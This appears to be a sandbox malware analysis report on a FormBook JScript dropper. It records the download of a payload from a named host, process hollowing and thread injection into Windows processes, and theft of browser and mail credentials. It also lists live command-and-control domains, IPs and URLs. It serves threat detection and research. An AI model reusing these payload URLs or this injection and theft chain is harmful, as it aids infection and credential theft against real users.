          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01120EA5 mov eax, dword ptr fs:[00000030h]11_2_01120EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01120EA5 mov eax, dword ptr fs:[00000030h]11_2_01120EA5
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0108FAB0 mov eax, dword ptr fs:[00000030h]11_2_0108FAB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01128ED6 mov eax, dword ptr fs:[00000030h]11_2_01128ED6
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010836CC mov eax, dword ptr fs:[00000030h]11_2_010836CC
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01098EC7 mov eax, dword ptr fs:[00000030h]11_2_01098EC7
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_0110FEC0 mov eax, dword ptr fs:[00000030h]11_2_0110FEC0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010676E2 mov eax, dword ptr fs:[00000030h]11_2_010676E2
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_010816E0 mov ecx, dword ptr fs:[00000030h]11_2_010816E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 11_2_01082AE4 mov eax, dword ptr fs:[00000030h]11_2_01082AE4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 9_2_0040CF93 LdrLoadDll,9_2_0040CF93
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Benign windows process drops PE files
          Source: C:\Windows\System32\wscript.exeFile created: HBhG[1].exe.0.drJump to dropped file
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
          Source: C:\Windows\System32\wscript.exeDomain query: hirosguide.hu
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 91.227.138.48 443Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.198.50 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.nftspaceview.com
          Source: C:\Windows\explorer.exeDomain query: www.hvlandscapes.biz
          Source: C:\Windows\explorer.exeDomain query: www.hayuterce.com
          Source: C:\Windows\explorer.exeDomain query: www.nortonseecurity.com
          Source: C:\Windows\explorer.exeDomain query: www.n-r-eng.com
          Source: C:\Windows\explorer.exeDomain query: www.thepromotionhunter.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.221.223.104 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 156.227.6.30 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.148 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mitsubangsaen.online
          Source: C:\Windows\explorer.exeDomain query: www.tf8dangky.online
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.2.66 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 46.28.105.2 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 164.88.201.214 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sandpiper-apts.com
          Source: C:\Windows\explorer.exeDomain query: www.popcors.com
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.138.206.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.teammart.online
          Source: C:\Windows\explorer.exeDomain query: www.laylaroseuk.com
          Source: C:\Windows\explorer.exeDomain query: www.wylvxing.com
          Source: C:\Windows\explorer.exeDomain query: www.suachuadienlanh247.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 173.230.227.171 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: 1380000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: EAA008Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\HBhG.exe "C:\Users\user\AppData\Local\Temp\HBhG.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: explorer.exe, 0000000A.00000002.786777732.0000000005D90000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: C:\Users\user\AppData\Local\Temp\HBhG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\HBhG.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.396764487.00000000012A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781120251.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.781365309.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts42
          Scripting          		Path Interception812
          Process Injection          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services11
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
          Deobfuscate/Decode Files or Information          		LSASS Memory13
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth11
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Exploitation for Client Execution          		Logon Script (Windows)Logon Script (Windows)42
          Scripting          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)5
          Obfuscated Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer15
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
          Software Packing          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Timestomp          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          File Deletion          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)31
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)812
          Process Injection          		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 794331 Sample: mt103.js Startdate: 30/01/2023 Architecture: WINDOWS Score: 100 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 10 other signatures 2->53 9 wscript.exe 16 2->9         started        process3 dnsIp4 37 hirosguide.hu 91.227.138.48, 443, 49714 DIGICABLEHU Hungary 9->37 27 C:\Users\user\AppData\Local\Temp\HBhG.exe, PE32 9->27 dropped 29 C:\Users\user\AppData\Local\...\HBhG[1].exe, PE32 9->29 dropped 65 System process connects to network (likely due to code injection or exploit) 9->65 67 Benign windows process drops PE files 9->67 69 JScript performs obfuscated calls to suspicious functions 9->69 71 Deletes itself after installation 9->71 14 HBhG.exe 1 9->14         started        file5 signatures6 process7 signatures8 73 Antivirus detection for dropped file 14->73 75 Multi AV Scanner detection for dropped file 14->75 77 Machine Learning detection for dropped file 14->77 79 3 other signatures 14->79 17 CasPol.exe 14->17         started        process9 signatures10 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Sample uses process hollowing technique 17->43 45 Queues an APC in another process (thread injection) 17->45 20 explorer.exe 1 1 17->20 injected process11 dnsIp12 31 www.nftspaceview.com 46.28.105.2, 80 WEDOSCZ Czech Republic 20->31 33 www.teammart.online 184.94.215.91, 49728, 49729, 49731 VXCHNGE-NC01US United States 20->33 35 21 other IPs or domains 20->35 55 System process connects to network (likely due to code injection or exploit) 20->55 24 control.exe 13 20->24         started        signatures13 process14 signatures15 57 Tries to steal Mail credentials (via file / registry access) 24->57 59 Tries to harvest and steal browser information (history, passwords, etc) 24->59 61 Modifies the context of a thread in another process (thread injection) 24->61 63 Maps a DLL or memory area into another process 24->63

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          mt103.js23%ReversingLabsScript-JS.Trojan.FormBook
          mt103.js29%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\HBhG.exe100%AviraHEUR/AGEN.1203876
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe100%AviraHEUR/AGEN.1203876
          C:\Users\user\AppData\Local\Temp\HBhG.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\HBhG[1].exe55%ReversingLabsByteCode-MSIL.Trojan.FormBook
          C:\Users\user\AppData\Local\Temp\HBhG.exe55%ReversingLabsByteCode-MSIL.Trojan.FormBook

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.CasPol.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.HBhG.exe.8a0000.0.unpack100%AviraHEUR/AGEN.1203876Download File

          Domains

          SourceDetectionScannerLabelLink
          hvlandscapes.biz1%VirustotalBrowse
          hirosguide.hu14%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.frogair.online/crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_100%Avira URL Cloudmalware
          http://www.laylaroseuk.com/crhz/?vG=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk&s91Fd8=b8xjX_100%Avira URL Cloudmalware
          http://www.popcors.com/crhz/?vG=0GDp9E6kCyw3PTEu7mcwaVDMse4qTFHKiPIjsnORLRuzWwrUUyHW5NbJCCyvt5dATvUBD9WLW/i5ogrnJ/OA7NWjCE9u9zkY8p+SshpKLRL6&s91Fd8=b8xjX_0%Avira URL Cloudsafe
          http://www.teammart.online/crhz/?vG=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41&s91Fd8=b8xjX_100%Avira URL Cloudmalware
          http://www.wylvxing.com/crhz/0%Avira URL Cloudsafe
          http://www.tf8dangky.online/crhz/0%Avira URL Cloudsafe
          http://www.nortonseecurity.com/crhz/?vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh/kgPh37+bmZ6fYtcBDUzbx8&s91Fd8=b8xjX_0%Avira URL Cloudsafe
          http://www.hayuterce.com/crhz/100%Avira URL Cloudmalware
          http://www.tf8dangky.online/crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_0%Avira URL Cloudsafe
          http://www.sandpiper-apts.com/crhz/?vG=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0&s91Fd8=b8xjX_100%Avira URL Cloudmalware
          http://www.hvlandscapes.biz/crhz/100%Avira URL Cloudmalware
          http://www.thepromotionhunter.com/crhz/0%Avira URL Cloudsafe
          http://www.frogair.online/crhz/100%Avira URL Cloudmalware
          http://www.thepromotionhunter.com/crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_0%Avira URL Cloudsafe
          http://www.sandpiper-apts.com/crhz/100%Avira URL Cloudmalware
          http://www.mitsubangsaen.online/crhz/100%Avira URL Cloudmalware
          http://www.teammart.online/crhz/100%Avira URL Cloudmalware
          http://www.nortonseecurity.com/crhz/0%Avira URL Cloudsafe
          http://www.popcors.com/crhz/0%Avira URL Cloudsafe
          https://hirosguide.hu/ti/HBhG.exe100%Avira URL Cloudmalware
          http://www.hvlandscapes.biz/crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_100%Avira URL Cloudmalware
          http://www.suachuadienlanh247.com/crhz/100%Avira URL Cloudmalware
          http://www.mitsubangsaen.online/crhz/?vG=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL&s91Fd8=b8xjX_100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          hvlandscapes.biz
          		76.223.105.230
          		truetrueunknown
          popcors.com
          		173.230.227.171
          		truetrue
            		unknown
            hirosguide.hu
            		91.227.138.48
            		truetrueunknown
            www.sandpiper-apts.com
            		164.88.201.214
            		truetrue
              		unknown
              thepromotionhunter.com
              		162.241.2.66
              		truetrue
                		unknown
                www.nftspaceview.com
                		46.28.105.2
                		truetrue
                  		unknown
                  frogair.online
                  		81.169.145.72
                  		truetrue
                    		unknown
                    www.hayuterce.com
                    		208.91.197.27
                    		truetrue
                      		unknown
                      laylaroseuk.com
                      		2.57.90.16
                      		truetrue
                        		unknown
                        www.nortonseecurity.com
                        		81.17.29.148
                        		truetrue
                          		unknown
                          www.teammart.online
                          		184.94.215.91
                          		truetrue
                            		unknown
                            www.wylvxing.com
                            		156.227.6.30
                            		truetrue
                              		unknown
                              www.suachuadienlanh247.com
                              		103.221.223.104
                              		truetrue
                                		unknown
                                ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.com
                                		18.138.206.213
                                		truefalse
                                  		high
                                  cname.u01.df.bkk1.cloud.z.com
                                  		163.44.198.50
                                  		truefalse
                                    		high
                                    www.tf8dangky.online
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.popcors.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.frogair.online
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.hvlandscapes.biz
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.n-r-eng.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.laylaroseuk.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.thepromotionhunter.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.mitsubangsaen.online
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.laylaroseuk.com/crhz/?vG=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5wfyZJWCK5Z18H2VF/y4/Kognk&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.wylvxing.com/crhz/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.teammart.online/crhz/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.teammart.online/crhz/?vG=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo3IMTbbHn1kxCLU7tvpznsmq41&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.frogair.online/crhz/?vG=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJCIVqiEyUfq8kF6FnqNv3PiNZk&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.popcors.com/crhz/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.popcors.com/crhz/?vG=0GDp9E6kCyw3PTEu7mcwaVDMse4qTFHKiPIjsnORLRuzWwrUUyHW5NbJCCyvt5dATvUBD9WLW/i5ogrnJ/OA7NWjCE9u9zkY8p+SshpKLRL6&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tf8dangky.online/crhz/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hvlandscapes.biz/crhz/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.nortonseecurity.com/crhz/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.nortonseecurity.com/crhz/?vG=u2x6Gy1HortC0OzN6Cd7rlFhxGPGvueuCm4nHgUvPGM1CfYq7BcXTxTrgZqaFf90LIlR1PLFkcg9+OygBsERh/kgPh37+bmZ6fYtcBDUzbx8&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tf8dangky.online/crhz/?vG=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEnJIHJg+N9005boEqGm8iwl7o0&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mitsubangsaen.online/crhz/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.hayuterce.com/crhz/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.thepromotionhunter.com/crhz/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.sandpiper-apts.com/crhz/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.sandpiper-apts.com/crhz/?vG=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTHfTI2iz39I/8+/5l0mHu4niU0&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.thepromotionhunter.com/crhz/?vG=7PBSSZr71x6DL80+Go9LpHzLxq3YNNMMRlSEKhN5FSdA0XFSySCq1gq9Qp9tYYXK4CHyqoic/rLoBaFB2vw5CqcWWhDf4yMIsnGwhNAmLwJ5&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.frogair.online/crhz/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    https://hirosguide.hu/ti/HBhG.exetrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.hvlandscapes.biz/crhz/?vG=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XfIT1Onmlscs+4wa7bdRvmZkTM&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.suachuadienlanh247.com/crhz/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.mitsubangsaen.online/crhz/?vG=nqmZBp2BkKhv5XD7JtliHBtb5J/nACgDXsCawcooXFLLWI2M3W+/ErAqTridlmxSnsXQQ5N94lpVUeLYPOpWHcmhsJP5m/P/TeGXz1gc+4vL&s91Fd8=b8xjX_true
                                                    • Avira URL Cloud: malware
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    162.241.2.66
                                                    		thepromotionhunter.comUnited States
                                                    		26337OIS1UStrue
                                                    46.28.105.2
                                                    		www.nftspaceview.comCzech Republic
                                                    		197019WEDOSCZtrue
                                                    76.223.105.230
                                                    		hvlandscapes.bizUnited States
                                                    		16509AMAZON-02UStrue
                                                    164.88.201.214
                                                    		www.sandpiper-apts.comSouth Africa
                                                    		137951CLAYERLIMITED-AS-APClayerLimitedHKtrue
                                                    91.227.138.48
                                                    		hirosguide.huHungary
                                                    		20845DIGICABLEHUtrue
                                                    208.91.197.27
                                                    		www.hayuterce.comVirgin Islands (BRITISH)
                                                    		40034CONFLUENCE-NETWORK-INCVGtrue
                                                    163.44.198.50
                                                    		cname.u01.df.bkk1.cloud.z.comSingapore
                                                    		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGfalse
                                                    184.94.215.91
                                                    		www.teammart.onlineUnited States
                                                    		394896VXCHNGE-NC01UStrue
                                                    18.138.206.213
                                                    		ladi-ladipage-dns-nlb-prod-2-33c473f14a5d5c08.elb.ap-southeast-1.amazonaws.comUnited States
                                                    		16509AMAZON-02USfalse
                                                    81.169.145.72
                                                    		frogair.onlineGermany
                                                    		6724STRATOSTRATOAGDEtrue
                                                    103.221.223.104
                                                    		www.suachuadienlanh247.comViet Nam
                                                    		18403FPT-AS-APTheCorporationforFinancingPromotingTechnolotrue
                                                    156.227.6.30
                                                    		www.wylvxing.comSeychelles
                                                    		135026THINKDREAM-AS-APThinkDreamTechnologyLimitedHKtrue
                                                    81.17.29.148
                                                    		www.nortonseecurity.comSwitzerland
                                                    		51852PLI-ASCHtrue
                                                    2.57.90.16
                                                    		laylaroseuk.comLithuania
                                                    		47583AS-HOSTINGERLTtrue
                                                    173.230.227.171
                                                    		popcors.comUnited States
                                                    		12180INTERNAP-2BLKUStrue

                                                    General Information

                                                    Joe Sandbox Version:36.0.0 Rainbow Opal
